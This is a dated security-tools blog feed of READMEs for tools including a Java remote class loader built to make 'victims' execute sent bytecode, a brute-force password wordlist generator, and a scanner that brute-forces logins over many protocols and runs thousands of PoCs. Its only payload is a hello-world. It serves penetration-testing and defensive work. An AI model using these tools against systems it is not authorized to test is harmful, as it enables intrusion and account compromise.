
Utkuici - Nessus Automation

4 October 2022 at 11:30
By: Zion3R


Today, with the widespread adoption of information technology systems, investments in cyber security have grown considerably. Vulnerability management, penetration tests and various analyses are carried out to determine how much our institutions can be affected by cyber threats. With Tenable Nessus, the industry leader in vulnerability management tools, it is possible to detect an IP address that has just joined the corporate network, a newly opened port, or an exploitable vulnerability, and a Python application that integrates with Tenable Nessus has been developed to identify these events automatically.


Features

  • Finding New IP Address
  • Finding New Port
  • Finding New Exploitable Vulnerability

Installation

git clone https://github.com/anil-yelken/Nessus-Automation
cd Nessus-Automation
sudo pip3 install -r requirements.txt

Usage

The SIEM IP address in the scripts should be changed before use.

To detect a new IP address reliably, the script checks whether the phrase "Host Discovery" appears in the Nessus scan name, records the live IP addresses in the database with a timestamp, and sends any newly seen IP address to the SIEM. The contents of the hosts table look as follows:

Usage: python finding-new-ip-nessus.py
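
For illustration, here is a minimal Python sketch of that diff-and-forward step (this is not the project's actual code; the SIEM address, the SQLite table layout and the way live IPs are obtained from the "Host Discovery" scan are assumptions):

# Sketch only: given a list of live IPs from a Nessus "Host Discovery" scan,
# record unseen ones with a timestamp and forward them to the SIEM over UDP.
import socket
import sqlite3
from datetime import datetime

SIEM_ADDR = ("192.168.1.100", 514)   # assumed SIEM IP/port - change as needed

def report_new_hosts(live_ips):
    conn = sqlite3.connect("nessus.db")
    conn.execute("CREATE TABLE IF NOT EXISTS hosts (ip TEXT PRIMARY KEY, first_seen TEXT)")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    for ip in live_ips:
        if conn.execute("SELECT 1 FROM hosts WHERE ip = ?", (ip,)).fetchone() is None:
            stamp = datetime.now().isoformat(timespec="seconds")
            conn.execute("INSERT INTO hosts VALUES (?, ?)", (ip, stamp))
            sock.sendto(f"New IP: {ip} {stamp}".encode(), SIEM_ADDR)   # only the difference is sent
    conn.commit()
    conn.close()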

By checking the port scans performed by Nessus, the port-IP-timestamp information is recorded in the database; when a newly opened service is detected from the database, the data is sent to the SIEM in the form "New Port:" port-IP-timestamp. The result observed in the SIEM is as follows:

Usage: python finding-new-port-nessus.py

Among the findings of vulnerability scans carried out in institutions and organizations, exploitable vulnerabilities should be closed first. The script records vulnerabilities that can be exploited with Metasploit in the database and, when it finds a new exploitable vulnerability on the systems, transmits this information to the SIEM. Exploitable vulnerabilities observed in the SIEM:

Usage: python finding-exploitable-service-nessus.py

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken




Java-Remote-Class-Loader - Tool to send Java bytecode to your victims to load and execute using Java ClassLoader together with Reflect API

3 October 2022 at 11:30
By: Zion3R


This tool allows you to send Java bytecode in the form of class files to your clients (or potential targets) to load and execute using Java ClassLoader together with the Reflect API. The client receives the class file from the server and returns the respective execution output. Payloads must be written in Java and compiled before starting the server.


Features

  • Client-server architecture
  • Remote loading of Java class files
  • In-transit encryption using ChaCha20 cipher
  • Settings defined via args
  • Keepalive mechanism to re-establish communication if server restarts

Installation

The tool has been tested using OpenJDK 11 with the JRE Java package, both on Windows and Linux (zip portable version). The Java version should be 11 or higher due to dependencies.

https://www.openlogic.com/openjdk-downloads

Usage

$ java -jar java-class-loader.jar -help

usage: Main
-address <arg> address to connect (client) / to bind (server)
-classfile <arg> filename of bytecode .class file to load remotely
(default: Payload.class)
-classmethod <arg> name of method to invoke (default: exec)
-classname <arg> name of class (default: Payload)
-client run as client
-help print this message
-keepalive keeps the client getting classfile from server every
X seconds (default: 3 seconds)
-key <arg> secret key - 256 bits in base64 format (if not
specified it will generate a new one)
-port <arg> port to connect (client) / to bind (server)
-server run as server

Example

Assuming you have the following Hello World payload in the Payload.java file:

//Payload.java
public class Payload {
    public static String exec() {
        String output = "";
        try {
            output = "Hello world from client!";
        } catch (Exception e) {
            e.printStackTrace();
        }
        return output;
    }
}

Then you should compile and produce the respective Payload.class file.
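
For example, with the JDK compiler:

$ javac Payload.java

This produces Payload.class in the current directory.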

To run the server process listening on port 1337 on all net interfaces:

$ java -jar java-class-loader.jar -server -address 0.0.0.0 -port 1337 -classfile Payload.class

Running as server
Server running on 0.0.0.0:1337
Generated new key: TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=

On the client side, you may use the same JAR package with the -client flag and the symmetric key generated by the server. Specify the server IP address and port to connect to. You may also change the class name and class method (defaults are Payload and String exec() respectively). Additionally, you can specify -keepalive to keep the client requesting the class file from the server while maintaining the connection.

$ java -jar java-class-loader.jar -client -address 192.168.1.73 -port 1337 -key TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=

Running as client
Connecting to 192.168.1.73:1337
Received 593 bytes from server
Output from invoked class method: Hello world from client!
Sent 24 bytes to server

References

Refer to https://vrls.ws/posts/2022/08/building-a-remote-class-loader-in-java/ for a blog post related to the development of this tool.

  1. https://github.com/rebeyond/Behinder

  2. https://github.com/AntSwordProject/antSword

  3. https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/

  4. https://www.sangfor.com/blog/cybersecurity/behinder-v30-analysis

  5. https://xz.aliyun.com/t/2799

  6. https://medium.com/@m01e/jsp-webshell-cookbook-part-1-6836844ceee7

  7. https://venishjoe.net/post/dynamically-load-compiled-java-class/

  8. https://users.cs.jmu.edu/bernstdh/web/common/lectures/slides_class-loaders_remote.php

  9. https://www.javainterviewpoint.com/chacha20-poly1305-encryption-and-decryption/

  10. https://openjdk.org/jeps/329

  11. https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/ClassLoader.html

  12. https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/reflect/Method.html



Bayanay - Python Wardriving Tool

2 October 2022 at 11:30
By: Zion3R


WarDriving is the act of navigating, on foot or by car, to discover wireless networks in the surrounding area.

Features

Wardriving is done by combining the SSID information captured with Scapy with location data obtained through the HTML5 geolocation feature.


Usage

I cannot be held responsible for malicious use of this tool.

ssidBul.py has been tested with a TP-LINK TL-WN722N adapter.

Selenium 3.11.0 and Firefox 59.0.2 are used by location.py. The Firefox geckodriver is located in the same directory as the scripts.

The SSID and MAC names and the location information shown below were created and altered in a test environment.

ssidBul.py and location.py must be run concurrently.

ssidBul.py result:

20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068
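
As a rough illustration of how such timestamp|MAC|SSID lines can be produced with Scapy (a simplified sketch, not ssidBul.py itself; the monitor-mode interface name is an assumption):

# Sketch: sniff 802.11 beacon frames and print "timestamp|MAC|SSID" lines.
# Requires a wireless interface already in monitor mode.
from datetime import datetime
from scapy.all import sniff, Dot11Beacon, Dot11Elt

seen = set()

def handle(pkt):
    if pkt.haslayer(Dot11Beacon):
        mac = pkt.addr2
        ssid = pkt[Dot11Elt].info.decode(errors="ignore")
        if mac not in seen:
            seen.add(mac)
            stamp = datetime.now().strftime("%d %B %Y %I:%M%p")
            print(f"{stamp}|{mac}|{ssid}")

sniff(iface="wlan0mon", prn=handle, store=False)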

Here is a screenshot of allowing location information while running location.py:

The screenshot of the location information is as follows:

konum.py result:

lat=38.8333635|lon=34.759741899|20 March 2018 11:47PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

After the data collection processes, the following output is obtained as a result of running wardriving.py:

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Deadfinder - Find Dead-Links (Broken Links)

1 October 2022 at 11:30
By: Zion3R


A dead link (broken link) is a link within a web page that can no longer be reached. Such links can have a negative impact on SEO and security. This tool makes it easy to identify and fix them.
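
Conceptually, a link counts as dead when the request fails outright or comes back with an error status. A rough Python illustration of the idea (DeadFinder itself is a Ruby gem; this is not its implementation):

# Concept only: a URL is "dead" if the request errors out or returns >= 400.
import requests

def is_dead(url: str) -> bool:
    try:
        return requests.get(url, timeout=10, allow_redirects=True).status_code >= 400
    except requests.RequestException:
        return True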


Installation

Install with Gem

gem install deadfinder

Docker Image

docker pull ghcr.io/hahwul/deadfinder:latest

Usage

Commands:
deadfinder file # Scan the URLs from File. (e.g deadfinder file urls.txt)
deadfinder help [COMMAND] # Describe available commands or one specific command
deadfinder pipe # Scan the URLs from STDIN. (e.g cat urls.txt | deadfinder pipe)
deadfinder sitemap # Scan the URLs from sitemap.
deadfinder url # Scan the Single URL.
deadfinder version # Show version.

Options:
c, [--concurrency=N] # Set Concurrency
# Default: 20
t, [--timeout=N] # Set HTTP Timeout
# Default: 10
o, [--output=OUTPUT] # Save JSON Result

Modes

# Scan the URLs from STDIN (multiple URLs)
cat urls.txt | deadfinder pipe

# Scan the URLs from File. (multiple URLs)
deadfinder file urls.txt

# Scan the Single URL.
deadfinder url https://www.hahwul.com

# Scan the URLs from sitemap. (multiple URLs)
deadfinder sitemap https://www.hahwul.com/sitemap.xml

JSON Handling

deadfinder sitemap https://www.hahwul.com/sitemap.xml \
-o output.json

cat output.json | jq


Pmanager - Store And Retrieve Your Passwords From A Secure Offline Database. Check If Your Passwords Have Leaked Previously To Prevent Targeted Password Reuse Attacks

30 September 2022 at 11:30
By: Zion3R


Demo

Description

Store and retrieve your passwords from a secure offline database. Check if your passwords have leaked previously to prevent targeted password reuse attacks.


Why develop another password manager?

  • This project was initially born from my desire to learn Rust.
  • I was tired of using the clunky GUI of keepassxc.
  • I wanted to learn more about cryptography.
  • For fun. :)

Features

  • Secure password storage with state-of-the-art cryptographic algorithms.
    • Multiple iterations of argon2id for key derivation, to make it harder for an attacker to conduct brute-force attacks.
    • AES-GCM-256 for database encryption.
  • Custom encrypted key-value database which ensures data integrity. (Read the blog post I wrote about it here.)
  • Easy to install and use. Does not require a connection to an external service for its core functionality.
  • Check whether your passwords have been leaked before, to avoid targeted password reuse attacks.
    • This works by hashing your password with keccak-512 and sending the first 10 hexadecimal characters to XposedOrNot (see the sketch below).
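
A rough Python illustration of that check (pmanager itself is written in Rust; only the hashing and truncation step is shown, and the actual XposedOrNot request is omitted):

# Illustration: keccak-512 the password and keep only the first 10 hex characters,
# which is all that would ever leave the machine.
from Crypto.Hash import keccak   # pycryptodome

def leak_check_prefix(password: str) -> str:
    digest = keccak.new(digest_bits=512, data=password.encode()).hexdigest()
    return digest[:10]           # this prefix is what gets sent to XposedOrNot

print(leak_check_prefix("hunter2"))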

Installation

Pmanager depends on the "pkg-config" and "libssl-dev" packages on Ubuntu. Simply install them with:

sudo apt install pkg-config libssl-dev -y

Download the binary file according to your current OS from releases, add the binary location to the PATH environment variable, and you are good to go.

Building from source

Ubuntu & WSL

sudo apt update -y && sudo apt install curl
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
sudo apt install build-essential -y
sudo apt install pkg-config libssl-dev git -y
git clone https://github.com/yukselberkay/pmanager
cd pmanager
make install

Windows

git clone https://github.com/yukselberkay/pmanager
cd pmanager
cargo build --release

Mac

I have not been able to test pmanager on a Mac system, but you should be able to build it from source ("cargo build --release"), since there is no OS-specific functionality.

Documentation

Firstly the database needs to be initialized using "init" command.

Init

# Initializes the database in the home directory.
pmanager init --db-path ~

Insert

# Insert a new user and password pair to the database.
pmanager insert --domain github.com

Get

# Get a specific record by domain.
pmanager get --domain github.com

List

# List every record in the database.
pmanager list

Update

# Update a record by domain.
pmanager update --domain github.com

Delete

# Deletes a record associated with domain from the database.
pmanager delete github.com

Leaked

# Check whether a password in your database has been leaked before.
pmanager leaked --domain github.com
pmanager 1.0.0

USAGE:
pmanager [OPTIONS] [SUBCOMMAND]

OPTIONS:
-d, --debug
-h, --help Print help information
-V, --version Print version information

SUBCOMMANDS:
delete Delete a key value pair from database
get Get value by domain from database
help Print this message or the help of the given subcommand(s)
init Initialize pmanager
insert Insert a user password pair associated with a domain to database
leaked Check if a password associated with your domain is leaked. This option uses
xposedornot api. This check achieved by hashing specified domain's password and
sending the first 10 hexadecimal characters to xposedornot service
list Lists every record in the database
update Update a record from database

Roadmap

  • Unit tests
  • Automatic copying to clipboard and cleaning it.
  • Secure channel to share passwords in a network.
  • Browser extension which integrates with offline database.

Support

Bitcoin Address -> bc1qrmcmgasuz78d0g09rllh9upurnjwzpn07vmmyj



SpyCast - A Crossplatform mDNS Enumeration Tool

29 September 2022 at 11:30
By: Zion3R


SpyCast is a crossplatform mDNS enumeration tool that can work either in active mode by recursively querying services, or in passive mode by only listening to multicast packets.


Building

cargo build --release

OS specific bundle packages (for example dmg and app bundles on OSX) can be built via:

cargo tauri build

SpyCast can also be built without the default UI, in which case all output will be printed on the terminal:

cargo build --no-default-features --release

Running

Run SpyCast in active mode (it will recursively query all available mDNS services):

./target/release/spycast

Run in passive mode (it won't produce any mDNS traffic and only listen for multicast packets):

./target/release/spycast --passive
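
Passive mode boils down to joining the mDNS multicast group and never sending a query. A rough Python illustration of that idea (SpyCast itself is written in Rust; this only mirrors the concept):

# Sketch: join the mDNS multicast group (224.0.0.251:5353) and report every
# packet seen, without ever transmitting a query of our own.
import socket
import struct

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("", 5353))
membership = struct.pack("4s4s", socket.inet_aton("224.0.0.251"), socket.inet_aton("0.0.0.0"))
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, membership)

while True:
    data, addr = sock.recvfrom(4096)
    print(f"{addr[0]} sent {len(data)} bytes of mDNS")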

Other options

Run spycast --help for the complete list of options.

License

This project is made with ♥ by @evilsocket and it is released under the GPL3 license.


Psudohash - Password List Generator That Focuses On Keywords Mutated By Commonly Used Password Creation Patterns

28 September 2022 at 20:31
By: Zion3R


psudohash is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more. It is keyword-based and highly customizable.


Pentesting Corporate Environments

System administrators and other employees often use a mutated version of the Company's name to set passwords (e.g. [email protected]_2022). This is commonly the case for network devices (Wi-Fi access points, switches, routers, etc), application or even domain accounts. With the most basic options, psudohash can generate a wordlist with all possible mutations of one or multiple keywords, based on common character substitution patterns (customizable), case variations, strings commonly used as padding and more. Take a look at the following example:

 

The script includes a basic character substitution schema. You can add/modify character substitution patterns by editing the source and following the data structure logic presented below (default):

transformations = [
    {'a' : '@'},
    {'b' : '8'},
    {'e' : '3'},
    {'g' : ['9', '6']},
    {'i' : ['1', '!']},
    {'o' : '0'},
    {'s' : ['$', '5']},
    {'t' : '7'}
]
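
As a rough illustration of how such a substitution schema expands a keyword into candidate words (a simplified sketch, not psudohash's actual mutation engine, which also handles casing, padding and numbering):

# Sketch: expand a keyword into variants using a character substitution schema.
from itertools import product

subs = {'a': ['@'], 'e': ['3'], 'i': ['1', '!'], 'o': ['0'], 's': ['$', '5']}

def mutate(word):
    choices = [[ch] + subs.get(ch, []) for ch in word.lower()]
    return {''.join(candidate) for candidate in product(*choices)}

print(sorted(mutate("admin")))   # ['@dm!n', '@dm1n', '@dmin', 'adm!n', 'adm1n', 'admin']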

Individuals

When it comes to people, I think we all have (more or less) set passwords using a mutation of one or more words that mean something to us, e.g. our name or a wife/kid/pet/band name, sticking the year we were born at the end, or maybe a super secure padding like "[email protected]#". Well, guess what?

Installation

No special requirements. Just clone the repo and make the script executable:

git clone https://github.com/t3l3machus/psudohash
cd ./psudohash
chmod +x psudohash.py

Usage

./psudohash.py [-h] -w WORDS [-an LEVEL] [-nl LIMIT] [-y YEARS] [-ap VALUES] [-cpb] [-cpa] [-cpo] [-o FILENAME] [-q]

The help dialog [ -h, --help ] includes usage details and examples.

Usage Tips

  1. Combining the options --years and --append-numbering with a --numbering-limit greater than or equal to the last two digits of any year input will most likely produce duplicate words because of the mutation patterns implemented by the tool.
  2. If you add custom padding values and/or modify the predefined common padding values in the source code, in combination with multiple optional parameters, there is a small chance of duplicate words occurring. psudohash includes word filtering controls but for speed's sake, those are limited.

Future

I'm gathering information regarding commonly used password creation patterns to enhance the tool's capabilities.



Scan4All - Vuls Scan: 15000+PoCs; 21 Kinds Of Application Password Crack; 7000+Web Fingerprints; 146 Protocols And 90000+ Rules Port Scanning; Fuzz, HW, Awesome BugBounty...

28 September 2022 at 11:30
By: Zion3R

  • What is scan4all: integrated vscan, nuclei, ksubdomain, subfinder, etc., fully automated and intelligent red-team tooling. Code-level optimization, parameter optimization, and individual modules, such as vscan filefuzz, have been rewritten for these integrated projects. In principle, the wheel is not reinvented unless there are bugs or problems
  • Cross-platform: based on a golang implementation, lightweight, highly customizable, open source; supports Linux, Windows, macOS, etc.
  • Supports password brute forcing for 21 protocols, supports custom dictionaries, enabled with "priorityNmap": true
    • RDP
    • SSH
    • rsh-spx
    • Mysql
    • MsSql
    • Oracle
    • Postgresql
    • Redis
    • FTP
    • Mongodb
    • SMB, also detect MS17-010 (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147, CVE-2017-0148), SmbGhost (CVE-2020-0796)
    • Telnet
    • Snmp
    • Wap-wsp (Elasticsearch)
    • RouterOs
    • HTTP BasicAuth
    • Weblogic, enable nuclei through enableNuclei=true at the same time, support T3, IIOP and other detection
    • Tomcat
    • Jboss
    • Winrm(wsman)
    • POP3
  • By default, intelligent HTTP password brute forcing is enabled; it is activated automatically when an HTTP password is required, without manual intervention
  • Detects whether nmap is present on the system and, with priorityNmap=true (enabled by default), uses nmap for fast scanning; the optimized nmap parameters are faster than masscan. Disadvantage of using nmap: on a poor network the packet volume may be too large, which can lead to incomplete results. Using nmap additionally requires setting the root password in an environment variable:

  export PPSSWWDD=yourRootPswd 

More references: config/doNmapScan.sh. By default, naabu is used to complete port scanning; use -stats=true to view the scanning progress. Can I skip port scanning?

noScan=true ./scan4all -l list.txt -v
# nmap result default noScan=true
./scan4all -l nmapRssuilt.xml -v
  • Fast 15000+ POC detection capabilities, PoCs include:
    • nuclei POC

    Nuclei Templates Top 10 statistics

TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT
cve | 1294 | daffainfo | 605 | cves | 1277 | info | 1352 | http | 3554
panel | 591 | dhiyaneshdk | 503 | exposed-panels | 600 | high | 938 | file | 76
lfi | 486 | pikpikcu | 321 | vulnerabilities | 493 | medium | 766 | network | 50
xss | 439 | pdteam | 269 | technologies | 266 | critical | 436 | dns | 17
wordpress | 401 | geeknik | 187 | exposures | 254 | low | 211 | |
exposure | 355 | dwisiswant0 | 169 | misconfiguration | 207 | unknown | 7 | |
cve2021 | 322 | 0x_akoko | 154 | token-spray | 206 | | | |
rce | 313 | princechaddha | 147 | workflows | 187 | | | |
wp-plugin | 297 | pussycat0x | 128 | default-logins | 101 | | | |
tech | 282 | gy741 | 126 | file | 76 | | | |

281 directories, 3922 files.

  • vscan POC
    • vscan POC includes: xray 2.0 300+ POC, go POC, etc.
  • scan4all POC
  • Support 7000+ web fingerprint scanning, identification:

    • httpx fingerprint
      • vscan fingerprint
      • vscan fingerprint: including eHoleFinger, localFinger, etc.
    • scan4all fingerprint
  • Support 146 protocols and 90000+ rule port scanning

    • Depends on protocols and fingerprints supported by nmap
  • Fast HTTP sensitive file detection, can customize dictionary

  • Landing page detection

  • Supports multiple types of input - STDIN/HOST/IP/CIDR/URL/TXT

  • Supports multiple output types - JSON/TXT/CSV/STDOUT

  • Highly integratable: Configurable unified storage of results to Elasticsearch [strongly recommended]

  • Smart SSL Analysis:

    • In-depth analysis automatically correlates domain names found in SSL information (such as *.xxx.com), completes subdomain traversal according to the configuration, and automatically adds the results to the scanning target list
    • Subdomain traversal for *.xx.com entries found in SSL information can be enabled with export EnableSubfinder=true, or adjusted in the configuration file
  • Automatically identify the case of multiple IPs associated with a domain (DNS), and automatically scan the associated multiple IPs

  • Smart processing:

      1. When the IPs of multiple domain names in the list are the same, port scans are merged to improve efficiency
      2. Intelligently handles abnormal HTTP pages, with fingerprint calculation and learning
  • Automated supply chain identification, analysis and scanning

  • Link python3 log4j-scan

    • This version fixes the issue where your target information was passed to the DNS log server, to avoid exposing vulnerabilities
    • Added the ability to send results to Elasticsearch in batches
    • A golang version will be implemented when time allows

How to use?
mkdir ~/MyWork/;cd ~/MyWork/;git clone https://github.com/hktalent/log4j-scan
  • Intelligently identify honeypots and skip targets. This function is disabled by default. You can set EnableHoneyportDetection=true to enable

  • Highly customizable: allow to define your own dictionary through config/config.json configuration, or control more details, including but not limited to: nuclei, httpx, naabu, etc.

  • support HTTP Request Smuggling: CL-TE, TE-CL, TE-TE, CL_CL, BaseErr


  • Support via parameter Cookie='PHPSession=xxxx' ./scan4all -host xxxx.com, compatible with nuclei, httpx, go-poc, x-ray POC, filefuzz, http Smuggling

work process


how to install

download from Releases

go install github.com/hktalent/[email protected]
scan4all -h

how to use

    1. Start Elasticsearch (of course, you can also use the traditional way of outputting results):
mkdir -p logs data
docker run --restart=always --ulimit nofile=65536:65536 -p 9200:9200 -p 9300:9300 -d --name es -v $PWD/logs:/usr/share/elasticsearch/logs -v $PWD/config/elasticsearch.yml:/usr/share/elasticsearch/config/elasticsearch.yml -v $PWD/config/jvm.options:/usr/share/elasticsearch/config/jvm.options -v $PWD/data:/usr/share/elasticsearch/data hktalent/elasticsearch:7.16.2
# Initialize the es index, the result structure of each tool is different, and it is stored separately
./config/initEs.sh

# Search syntax, more query methods, learn Elasticsearch by yourself
http://127.0.0.1:9200/nmap_index/_doc/_search?q=_id:192.168.0.111
where 192.168.0.111 is the target to query
  • Please install nmap yourself before use. Usage help:
go build
# Precise scan url list UrlPrecise=true
UrlPrecise=true ./scan4all -l xx.txt
# Disable adaptation to nmap and use naabu port to scan its internally defined http-related ports
priorityNmap=false ./scan4all -tp http -list allOut.txt -v

Work Plan

  • Integrate web-cache-vulnerability-scanner to realize HTTP request smuggling and cache-poisoning detection
  • Linkage with metasploit-framework: assuming the framework is already installed, cooperate with tmux and complete the linkage, with the macOS environment as the best practice
  • Integrate more fuzzers, such as linking sqlmap
  • Integrate chromedp to achieve screenshots of landing pages, detection of front-end landing pages with pure js and js architecture, and corresponding crawlers (sensitive information detection, page crawling)
  • Integrate nmap-go to improve execution efficiency, dynamically parse the result stream, and integrate it into the current task waterfall
  • Integrate ksubdomain to achieve faster subdomain blasting
  • Integrate spider to find more bugs
  • Semi-automatic fingerprint learning to improve accuracy; specify fingerprint name, configure

Q & A

  • How to use a Cookie?
  • libpcap-related questions

more see: discussions

Changelog

  • 2022-07-20 fix and PR nuclei #2301: bug with concurrent multi-instance execution
  • 2022-07-20 add web cache vulnerability scanner
  • 2022-07-19 PR nuclei #2308 add dsl function: substr aes_cbc
  • 2022-07-19 added DCOM protocol enumeration of network interfaces
  • 2022-06-30 embedded a private build of nuclei-templates with 3744 YAML POCs; 1. integrated Elasticsearch to store intermediate results; 2. embedded the entire config directory into the program
  • 2022-06-27 improved fuzzy matching for better accuracy and robustness; integrated ksubdomain progress
  • 2022-06-24 optimized the fingerprint algorithm; added a workflow diagram
  • 2022-06-23 added the ParseSSl parameter; by default, DNS information in SSL certificates is no longer deeply analyzed or scanned; fixed a bug where .exe was not automatically appended for nmap; fixed a bug where cache files were not size-optimized on Windows
  • 2022-06-22 integrated weak-password detection and password brute forcing for 11 protocols: ftp, mongodb, mssql, mysql, oracle, postgresql, rdp, redis, smb, ssh, telnet; also improved support for external password dictionaries
  • 2022-06-20 integrated Subfinder for subdomain enumeration, enabled with export EnableSubfinder=true (note: startup becomes slow); automatic deep drilling of domain names found in SSL certificates; custom dictionaries and related switches can be defined via config/config.json
  • 2022-06-17 improved handling of a domain resolving to multiple IPs: all IPs are port scanned and then follow the subsequent scanning workflow
  • 2022-06-15 this version adds several weblogic password dictionaries and webshell dictionaries collected from past engagements
  • 2022-06-10 completed the integration of nuclei, including of course the integration of nuclei templates
  • 2022-06-07 added a similarity algorithm to detect 404 pages
  • 2022-06-07 added a precise scan parameter for HTTP URL lists, enabled via the environment variable UrlPrecise=true


pyFlipper - Unofficial Flipper Zero CLI Wrapper Written In Python

27 September 2022 at 11:30
By: Zion3R


Unofficial Flipper Zero CLI wrapper written in Python

Functions and characteristics:

  • Flipper serial CLI wrapper
  • Websocket client interface

Setup instructions:

$ git clone https://github.com/wh00hw/pyFlipper.git
$ cd pyFlipper
$ python3 -m venv venv
$ source venv/bin/activate
$ pip install -r requirements.txt

Tested on:

  • Python 3.8.10 on Linux 5.4.0 x86_64
  • Python 3.10.5 on Android 12 (Termux + OTGSerial2WebSocket NO ROOT REQUIRED)

Usage/Examples

Connection

from pyflipper import PyFlipper

#Local serial port
flipper = PyFlipper(com="/dev/ttyACM0")

#OR

#Remote serial2websocket server
flipper = PyFlipper(ws="ws://192.168.1.5:1337")

Power

#Info
info = flipper.power.info()

#Poweroff
flipper.power.off()

#Reboot
flipper.power.reboot()

#Reboot in DFU mode
flipper.power.reboot2dfu()

Update/Backup

#Install update from .fuf file
flipper.update.install(fuf_file="/ext/update.fuf")

#Backup Flipper to .tar file
flipper.update.backup(dest_tar_file="/ext/backup.tar")

#Restore Flipper from backup .tar file
flipper.update.restore(bak_tar_file="/ext/backup.tar")

Loader

#List installed apps
apps = flipper.loader.list()

#Open app
flipper.loader.open(app_name="Clock")

Flipper Info

#Get flipper date
date = flipper.date.date()

#Get flipper timestamp
timestamp = flipper.date.timestamp()

#Get the processes dict list
ps = flipper.ps.list()

#Get device info dict
device_info = flipper.device_info.info()

#Get heap info dict
heap = flipper.free.info()

#Get free_blocks string
free_blocks = flipper.free.blocks()

#Get bluetooth info
bt_info = flipper.bt.info()

Storage

Filesystem Info

#Get the storage filesystem info
ext_info = flipper.storage.info(fs="/ext")

Explorer

#Get the storage /ext dict
ext_list = flipper.storage.list(path="/ext")

#Get the storage /ext tree dict
ext_tree = flipper.storage.tree(path="/ext")

#Get file info
file_info = flipper.storage.stat(file="/ext/foo/bar.txt")

#Make directory
flipper.storage.mkdir(new_dir="/ext/foo")

Files

#Read file
plain_text = flipper.storage.read(file="/ext/foo/bar.txt")

#Remove file
flipper.storage.remove(file="/ext/foo/bar.txt")

#Copy file
flipper.storage.copy(src="/ext/foo/source.txt", dest="/ext/bar/destination.txt")

#Rename file
flipper.storage.rename(file="/ext/foo/bar.txt", new_file="/ext/foo/rab.txt")

#MD5 Hash file
md5_hash = flipper.storage.md5(file="/ext/foo/bar.txt")

#Write file in one chunk
file = "/ext/bar.txt"

text = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""

flipper.storage.write.file(file, text)

#Write file using a listener
file = "/ext/foo.txt"

text_one = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""

flipper.storage.write.start(file)

time.sleep(2)

flipper.storage.write.send(text_one)

text_two = """All the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as
necessary, making this the first true generator on the Internet.
It uses a dictionary of over 200 Latin words, combined with a handful of
model sentence structures, to generate Lorem Ipsum which looks reasonable.
The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc.
"""
flipper.storage.write.send(text_two)

time.sleep(3)

#Don't forget to stop
flipper.storage.write.stop()

LED/Backlight

#Set generic led on (r,b,g,bl)
flipper.led.set(led='r', value=255)

#Set blue led off
flipper.led.blue(value=0)

#Set green led value
flipper.led.green(value=175)

#Set backlight on
flipper.led.backlight_on()

#Set backlight off
flipper.led.backlight_off()

#Turn off led
flipper.led.off()

Vibro

#Set vibro True or False
flipper.vibro.set(True)

#Set vibro on
flipper.vibro.on()

#Set vibro off
flipper.vibro.off()

GPIO

#Set gpio mode: 0 - input, 1 - output
flipper.gpio.mode(pin_name=PIN_NAME, value=1)

#Read gpio pin value
flipper.gpio.read(pin_name=PIN_NAME)

#Set gpio pin value
flipper.gpio.mode(pin_name=PIN_NAME, value=1)

MusicPlayer

#Play song in RTTTL format
rttl_song = "Littleroot Town - Pokemon:d=4,o=5,b=100:8c5,8f5,8g5,4a5,8p,8g5,8a5,8g5,8a5,8a#5,8p,4c6,8d6,8a5,8g5,8a5,8c#6,4d6,4e6,4d6,8a5,8g5,8f5,8e5,8f5,8a5,4d6,8d5,8e5,2f5,8c6,8a#5,8a#5,8a5,2f5,8d6,8a5,8a5,8g5,2f5,8p,8f5,8d5,8f5,8e5,4e5,8f5,8g5"

#Play in loop
flipper.music_player.play(rtttl_code=rttl_song)

#Stop loop
flipper.music_player.stop()

#Play for 20 seconds
flipper.music_player.play(rtttl_code=rttl_song, duration=20)

#Beep
flipper.music_player.beep()

#Beep for 5 seconds
flipper.music_player.beep(duration=5)

NFC

#Synchronous default timeout 5 seconds

#Detect NFC
nfc_detected = flipper.nfc.detect()

#Emulate NFC
flipper.nfc.emulate()

#Activate field
flipper.nfc.field()

RFID

#Synchronous default timeout 5 seconds

#Read RFID
rfid = flipper.rfid.read()

SubGhz

#Transmit hex_key N times(default count = 10)
flipper.subghz.tx(hex_key="DEADBEEF", frequency=433920000, count=5)

#Decode raw .sub file
decoded = flipper.subghz.decode_raw(sub_file="/ext/subghz/foo.sub")

Infrared

